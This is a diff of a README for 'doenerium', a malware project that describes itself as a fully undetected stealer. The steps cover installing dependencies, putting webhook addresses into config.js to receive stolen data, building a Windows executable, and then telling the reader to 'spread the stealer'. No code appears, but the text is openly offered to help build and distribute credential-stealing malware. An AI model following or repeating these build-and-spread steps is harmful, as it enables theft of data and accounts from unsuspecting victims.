vaginessa/doenerium/README.md

 - Install [NodeJS](https://nodejs.org/en/download/) and [Visual Studio](https://visualstudio.microsoft.com/de/downloads/) and C++ in Visual Studio
 - Install the required packages by running `install.bat`
 - Edit the `config.js` file and put your webhooks in it
-- Run the `build.bat` file and an .exe file named `index-win.exe` will be created
+- Run the `build.bat` file and an .exe file named `doenerium-win.exe` will be created
 - Spread the stealer and enjoy my fully undetected stealer :flushed:

 ## Showcase: